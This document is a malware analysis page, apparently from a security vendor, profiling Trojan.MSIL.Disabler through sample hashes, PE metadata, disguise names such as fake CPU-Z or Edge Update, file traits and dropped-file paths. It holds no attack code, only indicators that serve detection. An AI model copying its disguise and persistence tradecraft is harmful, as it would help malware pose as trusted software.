Trojan.MSIL.Disabler

By CagedTech in Trojans

Threat Scorecard

Popularity Rank:	2,110
Threat Level:	80 % (High)
Infected Computers:	2,365

First Seen:	March 27, 2024
Last Seen:	June 4, 2026
OS(es) Affected:	Windows

Table of Contents

Analysis Report

General information

Family Name:	Trojan.MSIL.Disabler
Signature status:	No Signature

Known Samples

MD5: 2bbebdfcb09ce9148f6c00d1d12b9a25

SHA1: 10fd68701b10a571ca44c8d0548f23bda1377e48

File Size: 69.12 KB, 69120 bytes

MD5: 78dc724a4aef8d20aeb88fca540b4b34

SHA1: 594a17cd80133d717f4ec33c93342808e72c7af5

File Size: 32.26 KB, 32256 bytes

MD5: 828c3cfa5bf65c6ec73aa07b4174126e

SHA1: 55f4ab725fee8f31295570c21054712a1a6b92fe

File Size: 1.00 MB, 1003697 bytes

MD5: dc14cf29aa0131d968e28ef8038894c0

SHA1: 1a359fb0a762f012a9a3109d9dfabef1e8c55e8f

SHA256: CA82E5AF7DA3CDF376A2D4F2B49E95683EB5A2468F9EEABF1C80C99B2B17EEF2

File Size: 95.23 KB, 95232 bytes

MD5: 17c49e03197481471defac53321a0f44

SHA1: 25009ab696b0b58ec5caec2e7b1b510068dac202

SHA256: 721AB167BA3F5132FA1B8B9B8FB9329687FBBC2810828F02BE7B887E1A49FF20

File Size: 236.54 KB, 236544 bytes

MD5: 29f86841c1bcebfcc2403119256a25ba

SHA1: 782eb4adc9f910c57ebfc5c66e62c612a5fd678e

SHA256: FC4451A851CB702AF0B9785117B5105D2562E5C1CC1188F17043B7FA971CB8C1

File Size: 1.27 MB, 1270784 bytes

MD5: 8332823f173850ad182d80c02723cb3a

SHA1: 2a30825f027b64035138cd7387dab3407b789edd

SHA256: 2EE1531499B97F8817F181131EDDCEF536D5AB3FD6BBA2F8311F74FBD98C56E6

File Size: 562.15 KB, 562147 bytes

MD5: 61ddb6f5eb185b886f0cc54b76b229b4

SHA1: bac69a8f0a0b0e1aa2d586887ff13a58b3d97b64

SHA256: F6250570AA8B2259A5B69E440D1AF1B3E20650460B2BFAA2F35E0478039B0732

File Size: 2.90 MB, 2900992 bytes

MD5: 553d662114b9e8196b9bcba59807186c

SHA1: 15d51105574f1a6a0195563c7385db6f0b087d69

SHA256: F0BF3F6E8946B02E1B56339B26AD27677928AE4C4A3AEAE4B6EF6AA428AA8147

File Size: 2.23 MB, 2227712 bytes

MD5: f83f34f206a22f02428aa2560e34c827

SHA1: 4ecaecf6da408dbcaadd608ade91d4defe217c05

SHA256: 6F35AF2F592FCE75C3867C3D60F718E195A42BFC88772D22D26BC05760A4EE8A

File Size: 650.75 KB, 650752 bytes

MD5: 95a96f8e151ea62c58078f10c758f38d

SHA1: 229535cd7780450490d11297e0c0866f58227c49

SHA256: 0533F95F961B28EFB7B747DDE819E8400D515140CD0BEECD14F55AC9A9A1EBCD

File Size: 28.67 KB, 28672 bytes

MD5: e53e6e12dcdca3ed907effda92fe87a2

SHA1: 2451907384a6576f1506b203b8ace85fa195bfef

SHA256: EBA58DADF593812539659EBCDDB3D805269C82E4522D265F5696418C6868C239

File Size: 235.01 KB, 235008 bytes

MD5: 3de701b616974be979f07aa53c7f5bdc

SHA1: 0d3407f279363533f49ba022844522d29ab80063

SHA256: 198B3BCFA103248427CDBBEA6861948E73013672FE0B0F87245C8F08A5B154DB

File Size: 235.01 KB, 235008 bytes

MD5: 031919207eb53b6286980853959f0a7e

SHA1: 08a65c086e0796f3a0a5e5e81693cd81797262bb

SHA256: AE2A1D9FB0FD47090C27EFFAB31AFC88F8B553B4C11A735616C7D31288554345

File Size: 95.23 KB, 95232 bytes

MD5: ff3e8e57e1ae0f495fd21789990dce0c

SHA1: b1239be7c5eb05af91b1395215da9586415c5775

SHA256: DE8D88C8C6E17466EEBF2EC4CFF04F9EC63E811A1D56AE7C21BE10F2F144D296

File Size: 95.23 KB, 95232 bytes

MD5: 319a7eb05a0027580bf67eb9d4f0ef1e

SHA1: 35ae95e6a227f1ea8c15394fb5777d08ed60c48b

SHA256: F0DE3510F49ECEB0B85D05DB022AABB09313BF24A0F7F29FA0066275E426383E

File Size: 331.18 KB, 331176 bytes

MD5: 5915370cab81507a6bf1d45d406533c3

SHA1: 08d1c60d541af2bf5dd17b17940d6a15ae7f333a

SHA256: 4951A660004CF2B514B86F25B9F4094E06F2FFD5B76626D0B94E2E492F2468AB

File Size: 24.06 KB, 24064 bytes

MD5: f19fc60af8e56e93f5c5d72b147223b2

SHA1: b01311de15e56340d639951a21d013a0e65cb617

SHA256: 183A123967C0BCCF63C826C7EB704CDA1082631C1781983D1E3608078C3B679D

File Size: 9.16 MB, 9164288 bytes

MD5: d0ec0d63815b3b4c219d656440d5c431

SHA1: 36f6497ed5033820f878ad3b88dbe4d2c1cf7f23

SHA256: B59158B43B9F1DE3BD31D7298D5641814967C403D08209FEBCEE4B4B89957088

File Size: 2.54 MB, 2543929 bytes

MD5: 14f360753efb098a683c3fca7d72c1f6

SHA1: 4a6f434d8d4bcc8009b981f2ab27d978fe1d7bbb

SHA256: 1A246628903784B583E4EA206A4B01E02D3355F7BA458F5C976A4EA21E5DE543

File Size: 115.71 KB, 115712 bytes

MD5: acdf6d8b26bec15d77e4ebe2b2f51ef9

SHA1: ed892a43ea0f50c59e13d176efb890687897bce3

SHA256: F861354D92369A2B8404BBFE164D8063E0FB9D7F944F0E0043BA15518E125722

File Size: 3.35 MB, 3353088 bytes

MD5: 6ec43de6137d798b68ef0deaf421005a

SHA1: 991fd8fe6585f2abe665662951da0caf80dce051

SHA256: F641060F9C46E3216220E5B628799E66BCFD507345D6A2E4EDC0EE73B02AC98E

File Size: 46.59 KB, 46592 bytes

MD5: 170898ec930be70be5fc1e51fb0d1249

SHA1: c082e213566269e76b6b39f75971878cae4d4d6b

SHA256: 6C7116D931B6E7AFD86D8E1B29ABA0888FAF39D8DB0E4E23283E6EBE2D5F9B68

File Size: 179.71 KB, 179712 bytes

MD5: e6ee7cbd81dc1de4a84729f372c3a905

SHA1: 4bbecc330f0f12632d20c80c3a8ec419b636b868

SHA256: 801DACA1D77DBE0C6F93C51CA8E7DF746D5CA87F4514ED1F8B6246272CC5DA33

File Size: 219.65 KB, 219648 bytes

MD5: 5cda6d1a164ad8d37cfdee7b21963708

SHA1: 145b890c95edf221348f6c2187cc494ef25ad7d7

SHA256: 75F9D46DA9A104D904C0E1ACAF699744F0532F801D90C361FD30434D3B237718

File Size: 491.01 KB, 491008 bytes

MD5: d5a7b260a1faf0a399524c65bb28f335

SHA1: 8dab02a8419985d91949fd689a2c90d10a1539b8

SHA256: 02D6A9D09A42F5F2B5199E2A1D72C496DED6D028AC5D7FECCB26698778A5E352

File Size: 3.18 MB, 3183054 bytes

MD5: fc15fb0cec248ea16a6eda92ab97b1f8

SHA1: 01af6a8e81a92487ed29b9706ef8c86957666a45

SHA256: 73E71DC70F6DAEEBD9A257D0B0C6E67E87C6D50B27EB94AF08D15F1AFB6ED02C

File Size: 33.28 KB, 33280 bytes

MD5: 537f6a4be5da686484b29e09bc410055

SHA1: d09937b6a184c2c44977894b063c2f8fb90f664b

SHA256: F3C779557DEC8A142878C34972B25E513482BED4A0712F3216E2101AA9397101

File Size: 33.28 KB, 33280 bytes

MD5: 8ab6b08189247d639c4079a3fb65bc09

SHA1: a111941e14fd81897891ed710b1599cfd951f46c

SHA256: 143ABDB012D421DC81323A29A4218C98E0EC8C31AFC8EA3CE79A95B13FC14DE4

File Size: 3.68 MB, 3680256 bytes

MD5: f3fdc8a5aea79f1a79dd1f53766d5534

SHA1: df2b78d6c3509b1af05b8c09a117fe03a5d1fe4b

SHA256: 4081DFC0C3789A0A1540EA2BB5D163C2E7990284B3322FA4EF0E41B2999953B8

File Size: 95.23 KB, 95232 bytes

MD5: 4d6e3223769a5966ca3a485075f264d1

SHA1: b9700b2deb302a8aed4fbbcb3963c332c26ba69c

SHA256: E5B9D2AA0DADFB30AADDE256ED5B95A9B8B6D74816CEF7004E8CD3E3C8C01F14

File Size: 435.23 KB, 435232 bytes

MD5: a93cc99a408272bff99a348e54492e55

SHA1: 8d4580d01df210840e6d0a60f168cdc86c42f6f4

SHA256: D74A94B948F42B3F59A938F658A450A1707540B54FEB75E3CA4201FCE93FB6F2

File Size: 236.54 KB, 236544 bytes

MD5: 91ef134f9c1084cbb171d27992d82a88

SHA1: c449d36ed1a2617b12595ef55d3b41a817e69b5f

SHA256: 219415B583B4CFD3B369703BF13CB85C3662D1F85D8C93BF91FE21CBBEDCE254

File Size: 236.54 KB, 236544 bytes

MD5: 1c2e67ea15123b8d78b02d8bd3226f5b

SHA1: 8da30782988c0ac87fdd027ddaebc9a233d48aa7

SHA256: A8348103C0ED694B867CCD43616C7B00F894ABDEB277CBFE3FDBA400DDDFEBAF

File Size: 2.87 MB, 2865152 bytes

MD5: 91f648f2a7aa9d43d0be659fc66742de

SHA1: d5296070848ea8ebd7b149f79dc6cead04e7d9fa

SHA256: 33BA1B08C25B878462292A3C5116773DBC7C03C1E05E8FD92CB300FA33E80648

File Size: 3.85 MB, 3854336 bytes

MD5: 5e22e46514a6edee41d81b19b9f786b1

SHA1: faa529456eaf475fa34533bc3a9f36467197acf7

SHA256: A46B50C135B9C587B3C3406923E457A7C0AA291D3F415CA15674CB7383FCE7FF

File Size: 278.53 KB, 278528 bytes

MD5: 13262804ba63842db2399d6e1f1a410d

SHA1: 09a99acf1fb716fca9962bfa2be8dd8203589283

SHA256: 2B13DC9FA80AA7AE0838AE0AEB7E4A279F90BCC8764F00A7B6F6930FB8DB0C94

File Size: 61.95 KB, 61952 bytes

MD5: 27b8ca9dfb1315327a12f62c25ef5ee6

SHA1: ca8a10f9a525fcbc2f5e0ee380893fb765944afe

SHA256: 1407726C4A4E765709EBA188B616B4FB84CDA8801E167F64D426CD2955B89A18

File Size: 7.03 MB, 7025664 bytes

MD5: 8448a16e8a79c2fa3f0b0d61babe3667

SHA1: 26fed7480392eafe76f4a844a6ba47492b8d0788

SHA256: 9EB3E3EAF5B3D22213E542E09D1C269698ED794B386B1AA2FDBC3672FAB3CFB9

File Size: 55.81 KB, 55808 bytes

MD5: 24fbdba7ba1dc98c96e53a559d4cd5c5

SHA1: 5de105c22d3d342226e63fa7a19c18daf4879c3c

SHA256: D4DAE5C87B3C28589215C52A7448729BEA41FD594C792F4D82969E7E182765C0

File Size: 531.82 KB, 531824 bytes

MD5: 61ebede3851d1fe194b691649b0c30a1

SHA1: 822474532552558e90000051e3f750ae7d766a65

SHA256: 1D0D5239C1B83361DAD5B8F8CE41FA0A17A9B59DF52929D6BF51E2CEC58CD045

File Size: 2.01 MB, 2012160 bytes

MD5: 8f2f822f46e95d14520530c34988be15

SHA1: 76a38d6844895bc102bf3dc9b87db06b3136c1b0

SHA256: B86A4B5DC82D07AF27EA9D7B8099CBC7F7AD7FBEFD5CE73D0F3D718D8A6ED23A

File Size: 9.32 MB, 9324323 bytes

MD5: c4c139b161786e590b6f4a0e6007f43b

SHA1: 93d73944f5277b4e4b47923084938306dce62913

SHA256: D22DC97FE805711A74ACECB0A49012A5662DAF8B988724926F3613612AF6D017

File Size: 41.47 KB, 41472 bytes

MD5: 15acc638460977206abf0f2803e88151

SHA1: c8eaaef22e876b1e5a3094a0ca1c986e52287bad

SHA256: E232763160A4C2307779F80CFB53396092D1BD040FBEA42DC43506E7BCBAA072

File Size: 41.47 KB, 41472 bytes

MD5: 1538a4507b6795038102092b8087b5cb

SHA1: 67d705d3ddd599903ee64210eeb5a944da67c178

SHA256: CD41746F31038E2A6B06078D194D87AB347AEFCF3EB355F33E9A83AE41F6CBE0

File Size: 781.82 KB, 781824 bytes

MD5: 3996e651e101079f06e9cbe08ccdf05c

SHA1: 083e3213ca9ccd9f000e50df508fea935ca68a4b

SHA256: 66E23605D449D0FC018BAB8F1CC22006911FDDC93A07F10AA05A4513EAA5351B

File Size: 39.42 KB, 39424 bytes

MD5: 221e372196ad28662cd5494c10e3e6e9

SHA1: 839fa4349c4de43003e40fa4c64d316b2dc10737

SHA256: D2E85B6EE82F8045FFF9F5EB6809DC90CC135AF673A5E11CB0B3873BCE231E86

File Size: 1.41 MB, 1405952 bytes

MD5: 918951c4657e9cdf39ac1b275bfd2e95

SHA1: 7323e59b2c4d60b6639bfcba11f4c02bcb94e347

SHA256: B50D25C24BA5F1F096E883B3A9970D2C080AFB37DFE2F55A25A1C7ED3CA36505

File Size: 3.45 MB, 3450400 bytes

MD5: 423380e0d178321dcd91ab2695718046

SHA1: 35d9fb2e55895261666336bfe935c9bd8814f19e

SHA256: 5882E12630E944227CEF473FA9CE28263871A877259DB9B5F9A87979578CE41C

File Size: 49.66 KB, 49664 bytes

MD5: a2161c9586502da00919aafbd56ffb56

SHA1: 42c079dde3b84fd6eb3bbadb4847d1c9a29f26df

SHA256: D2DB66444B33AFF9EC77EDFBEF9596C9B057B5047D78EC6AF30993B4837B0D5C

File Size: 132.61 KB, 132608 bytes

MD5: e188202501f604ebe866db32d71fc96e

SHA1: d05390280526c4e85f11f7bbc3048427717fff71

SHA256: 14836742584BAD1349E287621A201C032E4E699A883136BD3E1774A807894C45

File Size: 69.12 KB, 69120 bytes

MD5: ace8d776d5ba401143732d7a22e5f389

SHA1: de53b98c2ff8d9d6fd6e4fca09005f73160f0006

SHA256: B175ACDEA607F203346F7F871F7DFA8C439389B157CE80DF321369536A6BF9EA

File Size: 1.13 MB, 1134080 bytes

MD5: 58fdbeedd845dfc5b330d33635eb1b35

SHA1: 2e9b6220b931412671b4c9dd2795a1935429f9b4

SHA256: 0ED3031CE41FB95CC13050E8A53DD58E7A4901511ECBA134242B07C085AFCC6D

File Size: 3.17 MB, 3171328 bytes

MD5: a63bbfbc39a138a5427bd083d0ac1957

SHA1: b0dcbacd80fac6b29af812b4b682116e17c230b7

SHA256: 0D52A001635C0459EEFB82D827E496452D679C1507F97908839116C30EA11329

File Size: 41.47 KB, 41472 bytes

MD5: b505b7f69928ee284200fec664240c97

SHA1: 28cfb30f32061bd008fd3baca7df620ad33215e3

SHA256: 0FA681978C4FF141B133E0F0F5A4AD7A786603687F563BFFE23355E5774CBA3D

File Size: 2.22 MB, 2223239 bytes

MD5: 8b928f22138afcf3a28010026d064808

SHA1: abd228d1794c0147fad6bd0612605d6b0d6174d0

SHA256: 8CDBF8B3711BA9E6C14EFCE4BCC71B7AE4C515A581E6C734CF37EF6CC5F2AA7E

File Size: 7.12 MB, 7122944 bytes

MD5: 03898be29fb6c5464b28ae0239713b7b

SHA1: a89158fe7d762dca8f136498a4120e3597933cab

SHA256: F30F32937999ABE4FA6E90234773E0528A4B2BD1D6DE5323D59AC96CDB58F25D

File Size: 520.70 KB, 520704 bytes

MD5: 7af176fc586018179b06d3fae3a2afa8

SHA1: 9030b9fec592a1b44f60a50761fed2f9c5d87ba7

SHA256: BEE44138F6F337FE334A0467F5D7FCC764755C4DC34AE4878064012DB9C1C952

File Size: 16.38 KB, 16384 bytes

MD5: c6879a1b3e39c6df392e9ab8b9c74624

SHA1: c04899e5d58f293b4ab1f609f84a7d3bfe0382b7

SHA256: 3C66A1E0EDCE92B9454E6B22725051446E50DC3F4CB3FC41E2B25960CFD0FC5C

File Size: 1.39 MB, 1393664 bytes

MD5: be1e36d166e60f61fad74683c6a6f48a

SHA1: b5f855d8ded2e1d0658a0d555e545a3944002ec8

SHA256: 29AC8269EBFBCF468590757690E3B688D6EDBE1233A13D3451E73605E520A68E

File Size: 6.40 MB, 6399488 bytes

MD5: 7e4dbef0d6b8dc36d25af537a22707d8

SHA1: eb7cbe90435787ad7a8007e6479f660fa44e5d46

SHA256: FD456B8A7D081FFC3D4DEA2CF2DEA1DC199B4301EDD4128786C3E3D6AB62AF23

File Size: 29.70 KB, 29696 bytes

MD5: 05c8ee1611b9852b78ce4dfc1146db45

SHA1: 708acb0961f31a789ad84002f9d8ca8de8a071c3

SHA256: 1D5202465BF451C8B2B8F758FE68D72D0E6AA65BFC1DFFFCDEAD6E4A2F1249F7

File Size: 2.87 MB, 2868224 bytes

MD5: 21ca465f00384bbbd84c9d3b80f8f629

SHA1: 4d5ab0e674e29886c1685c188cbb4d5bfacb6a73

SHA256: C2B917A4748ECA21F3356E848A3E81155CAA6B21C14E283C78F6CF6D017A4768

File Size: 1.52 MB, 1523712 bytes

MD5: 0188f14db95016691f0d738eef0e277f

SHA1: f05dd357bfbe5c1c73f5c6f6c2277ed452c858c6

SHA256: 14CE399FDD253DF979FA369DAEAEEC88B785F661F2B288000345746A3DDB78A1

File Size: 32.77 KB, 32768 bytes

MD5: fbcd7ba1cfa4caddaaca3b793303f04f

SHA1: 799ccfc66cdce7f80b319cf7d2cbe1332fe0c8be

SHA256: A852911B0D4E13C26866C2C9943407469417B8ABF4E54AD5F6C293ECBA9F9FC2

File Size: 133.01 KB, 133008 bytes

MD5: 49408c3749067756dadc9fbd09c1e5d0

SHA1: 486e703777cc93968fa1ed75ef807f8bad32683b

SHA256: 3D0689966D32725F27250BF71B2994D1AEE3893840997FDF1EBF0878EC73994D

File Size: 3.04 MB, 3043840 bytes

MD5: a8f07478fe1f68c9b4f9fb81df1ab980

SHA1: afb020fbdc19ee533f659cc0d789ef5caa5c4f4e

SHA256: CA91AF3B76402A86D474467CE7D3AC8D8B979AF6CEFEF09381927B60F8428CFB

File Size: 24.06 KB, 24064 bytes

MD5: b4a1d0d28b37f80157b48c04b7d76ceb

SHA1: 1024d8fe155273943609c00b0ecae6a46c357cd4

SHA256: 99B14A6658FFCF2E62D84A85F96D50ACCEF2311B6BFFBA6422AD091CE6D42630

File Size: 807.42 KB, 807424 bytes

MD5: caa75b1c0e79a68f109db969cf724229

SHA1: ae79dcba4d437be1c51267ee09ae9861c1002e67

SHA256: 614A0C79FDB8CF3C42FEB8C56A636C38193997F359167B104D374F5C62CF1159

File Size: 51.71 KB, 51712 bytes

MD5: 5d30b3f304b6c2854054f8e89c74b391

SHA1: 7988d5e6aef85a2b109e736d293faa1116ac5210

SHA256: 484911771A6A435510B321F6FDD055E219FCB9A099EE5B4FBB33392C04A7C233

File Size: 54.78 KB, 54784 bytes

Windows Portable Executable Attributes

File doesn't have "Rich" header
File doesn't have debug information
File doesn't have exports table
File doesn't have relocations information
File doesn't have resources
File doesn't have security information
File has exports table
File has TLS information
File is .NET application
File is 32-bit executable

File is 64-bit executable
File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
File is either console or GUI application
File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
File is Native application (NOT .NET application)
File is not packed
IMAGE_FILE_DLL is not set inside PE header (Executable)
IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

66 additional icons are not displayed above.

Windows PE Version Information

Name	Value
Assembly Version	2025.4.1.2 11.6.0.0 10.0.26100.6725 8.4.1.0 8.3.0.41085 6.2.22621.1 5.4.23.729 5.3.23.900 5.2.46.2 4.20.3.0 Show More 2.5.0.0 2.0.9.0 2.0.0.62 1.5.3.0 1.5.2.0 1.3.7.0 1.0.6.1 1.0.0.0 0.0.0.0
Assembly Version	0.0.0.0
Comments	4winkey_pf CPU-Z Downloader e instalador para o cliente SkyMu Launcher Premium GamesWteam Main Immersed Agent .NET Component Payload file for Umbral Stealer. Payload for Umbral Stealer Perfect Windows 10 & 11 setup with essential settings for maximum convenience Portable Tool for an Ideal Windows Setup Program for the GTAV Speedrunning Community Show More This installation was built with Inno Setup. True Mining Desktop Mining Software
Company Name	Abelssoft CPU-Z GamesWteam Haerubot Hammer HeroesVLobby Immersed KorepiLauncher KrovaX LSI Software S.A. Show More Lumen-Checker Magnet Forensics® Inc. Microsoft Corporation optimizerDuck Project 1.27 Inc. SpiidXP SupremeRunner The No-Frauds Club True Mining velocityfixer
File Description	4winkey_pf Client Server Runtime Process CPU-Z Crysome.Client csrss Fix Eternity FolderExcluder Fraud Launcher 2 Free, open-source Windows optimization tool for performance, privacy, and simplicity. GastroServiceTool Show More GTweak Haerubot Hammer HeroesVLobby HFE__Add_Defender_Exclusion Immersed Agent GUI InstaladorProsepagoNet Instalador SkyMu InstallerProject KorepiLauncher Launcher MuOnline Lumen-Checker luncher rayman aréna Magnet AXIOM Process Microsoft Edge Update Project 127 ShellHost sk_Drever SN_Changer SpiidXP SSD Fresh SupremeRunner True Mining Desktop velocityfixer WarRock Montana Installer
File Version	2025.4.1.2 15.01.61691 11.6.0.0 10.0.26100.6725 8.4.1.0 8.3.0.41085 6.2.22621.1 5.4.23.729 5.3.23.900 5.2.46.2 Show More 4.20.3 2.5 2.0.9.0 2.0.0.62 1.5.3.0 1.5.2.0 1.3.133.5 1.3.7 1.0.6.1 1.0.0.3 1.0.0.0 0.0.0.0
Internal Name	4winkey_pf.exe AntidoteTool.exe AXIOMProcess.exe CPLApplet.dll CPU-Z.exe Crysome.Client.exe csrss.exe DrivessUbuntu Fix Eternity.exe FolderExcluder.exe Show More Fraud Launcher 2.dll GastroServiceTool.exe GTweak.exe Haerubot.dll Hammer.dll HeroesVLobby.dll HFE__Add_Defender_Exclusion.exe Immersed.exe InstaladorProsepagoNet.exe Instalador SkyMu.dll KorepiLauncher.dll LauncherGamesWteam.exe Loader.exe Lumen-Checker.exe Manutenção.exe Microsoft Edge Update MuOnlineInstaller.exe optimizerDuck.dll PedalDownloader.exe Project 1.27.exe Ra_deo.exe Realtek HD Audio Universal Service.exe ShellHost.exe SK_DRIVER.exe SN Changer.exe SpiidXP.dll Steal2.exe Stub.exe SupremeRunner.exe TGX.dll True Mining Desktop.dll Update.exe v31.exe velocityfixer.dll WarRock Installer.exe winlogon.exe XWormClient.exe
Language Id	sr-Cyrl-RS
Legal Copyright	4winkey_pf © 2023 Copyright (C) 2019-2023 True Mining Copyright Microsoft Corporation Copyright © 1907 Copyright © 2017 ~ 2025 Copyright © 2018 Copyright © 2019 Immersed Inc. All rights reserved. Copyright © 2020 Copyright © 2022 Copyright © 2024 Show More Copyright © 2025 Copyright © LSI Software S.A. 2025 Copyright © Magnet Forensics Inc. 2024 Copyright © WarRock Montana 2025 CPU-Z © 2023 © 2024-2025 Greedeks © 2024-2026 Greedeks © Abelssoft, Inc. © Microsoft Corporation. All rights reserved. 파이널판타지14 KR 해루@모그리
Legal Trademarks	4winkey_pf CPU-Z GamesWteam Greedeks Project 1.27 TradeMark
Original Filename	4winkey_pf.exe AntidoteTool.exe AXIOMProcess.exe CPLApplet.dll CPU-Z.exe Crysome.Client.exe csrss.exe DrivessUbuntu Fix Eternity.exe FolderExcluder.exe Show More Fraud Launcher 2.dll GastroServiceTool.exe GTweak.exe Haerubot.dll Hammer.dll HeroesVLobby.dll HFE__Add_Defender_Exclusion.exe Immersed.exe InstaladorProsepagoNet.exe Instalador SkyMu.dll KorepiLauncher.dll LauncherGamesWteam.exe Loader.exe Lumen-Checker.exe Manutenção.exe msedgeupdate.dll MuOnlineInstaller.exe optimizerDuck.dll PedalDownloader.exe Project 1.27.exe Ra_deo.exe Realtek HD Audio Universal Service.exe ShellHost.exe SK_DRIVER.exe SN Changer.exe SpiidXP.dll Steal2.exe Stub.exe SupremeRunner.exe TGX.dll True Mining Desktop.dll Update.exe v31.exe velocityfixer.dll WarRock Installer.exe winlogon.exe XWormClient.exe
Product Name	4winkey_pf CPU-Z Crysome.Client csrss Fix Eternity FolderExcluder Fraud Launcher 2 GastroServiceTool GTweak Haerubot Show More Hammer HeroesVLobby HFE__Add_Defender_Exclusion Immersed Agent InstaladorProsepagoNet InstallerProject KorepiLauncher Launcher - GamesWteam Lumen-Checker luncher rayman aréna Magnet AXIOM Process Microsoft Edge Update Microsoft® Windows® Operating System optimizerDuck Project 127 SkyMu Game Downloader sk_Drever SN_Changer SpiidXP SSD Fresh SupremeRunner True Mining Desktop velocityfixer WarRock Montana Installer
Product Version	Build: 5.4.9 Build: 5.3.1 Build: 5.2.5 2025.4.1.2 15.01.61691 11.6.0.0 10.0.26100.6725 8.4.1.0 8.3.0.41085 6.2.22621.1 Show More 4.20.3 2.5+902e0dd74c08911a5cd901dbdd054132bdaa02b7 2.0.9.0 2.0.0.62 1.5.3.0 1.5.2.0 1.3.133.5 1.3.7+54db88b8f7971ce378ccb54aa257701c63f8e303 1.0.0.3 1.0.0.0 1.0.0+d6d9fd5815cf8001a72523a99eff99b731e7b391 1.0.0 0.0.0.0
Upstream Version	1.3.99.0

Digital Signatures

Signer	Root	Status
Elda Studios Limited	SSL.com Root Certification Authority RSA	Root Not Trusted
Raecomm Services Ltd	SSL.com Root Certification Authority RSA	Root Not Trusted

File Traits

.NET
2+ executable sections
Agile.net
big overlay
CreateThread
CryptUnprotectData
dll
Fody
Gdrive
HighEntropy

Installer Manifest
Installer Version
NewLateBinding
No CryptProtectData
No Version Info
ntdll
RAR (In Overlay)
RARinO
RijndaelManaged
Run
vmp section variant
WinRAR SFX
WRARSFX
WriteProcessMemory
x64
x86

Block Information

Total Blocks:	81
Potentially Malicious Blocks:	1
Whitelisted Blocks:	14
Unknown Blocks:	66

Visual Map

0 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 0 0 ? 0 0 ? ? ? ? 0 ? 0 0 ? ? 0 0 ? ? ? 0 ? ? ? 0 x ? ? 0 ? ? 0 ? ? ?

0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

MSIL.AsyncRAT.L
MSIL.Bladabindi.A
MSIL.FakeMS.OA
MSIL.Gamehack.BYJ
MSIL.Krypt.UJB

Files Modified

File	Attributes
\device\namedpipe	Generic Read,Write Attributes
\device\namedpipe	Generic Write,Read Attributes
\device\namedpipe\dav rpc service	Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\gmdasllogger	Generic Write,Read Attributes
\device\namedpipe\pshost.134123407543776595.7060.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134199996858702057.3888.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134245862189083929.1952.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\wkssvc	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\recovery\oem\xjd9xk95u1hy.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\clr	Synchronize,Write Attributes

c:\users\user\appdata\local\microsoft\clr\conhost.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\clr\conhost.exe	Synchronize,Write Attributes
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.0.regtrans-ms	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.1.regtrans-ms	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.2.regtrans-ms	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\1234.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\3.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_54qjub0j.jgm.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_a03gpzsk.by0.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_azr4l1tp.hbg.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_iiq0dyxk.pbb.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_mawq4l2x.end.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_s3femh4g.hgm.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\crysome_debug.log	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\dis.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-8jn9p.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-jh3nh.tmp\76a38d6844895bc102bf3dc9b87db06b3136c1b0_0009324323.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\realtek hd audio universal service.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\sam x222c#.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\server.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\windows defender real time protection.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\windows.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\winter.bll	Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\local\unins000.dat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\microsoft\sysaudio.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows	Synchronize,Write Attributes
c:\users\user\appdata\roaming\microsoft\windows\runtimebroker.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\microsoft\windows\runtimebroker.exe	Synchronize,Write Attributes
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\09b9e928cd9c82b36411a4d793f79e51.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
